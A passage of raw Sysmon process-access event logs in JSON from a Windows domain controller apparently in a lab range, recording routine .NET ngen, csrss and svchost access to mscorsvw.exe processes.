05:58:43.980","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-0010E0E70E00}","TargetProcessId":"4052","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7112,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.980\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-0010E0E70E00}\r\nTargetProcessId: 4052\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.980","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-0010E0E70E00}","TargetProcessId":"4052","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7113,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.980\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-0010E0E70E00}\r\nTargetProcessId: 4052\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.980","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-0010E0E70E00}","TargetProcessId":"4052","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7114,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:44.027\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-0010A5BC0D00}\r\nTargetProcessId: 488\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:44.027","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-0010A5BC0D00}","TargetProcessId":"488","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7115,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:44.027\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-0010A5BC0D00}\r\nTargetProcessId: 488\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:44.027","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-0010A5BC0D00}","TargetProcessId":"488","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7116,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:44.027\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-0010A5BC0D00}\r\nTargetProcessId: 488\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:44.027","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-0010A5BC0D00}","TargetProcessId":"488","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7117,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:44.058\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048D-5F25-0000-0010A5200E00}\r\nTargetProcessId: 3380\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:44.058","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048D-5F25-0000-0010A5200E00}","TargetProcessId":"3380","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7118,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:44.058\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048D-5F25-0000-0010A5200E00}\r\nTargetProcessId: 3380\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:44.058","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048D-5F25-0000-0010A5200E00}","TargetProcessId":"3380","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7119,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:44.074\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0494-5F25-0000-001040EF0E00}\r\nTargetProcessId: 3380\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 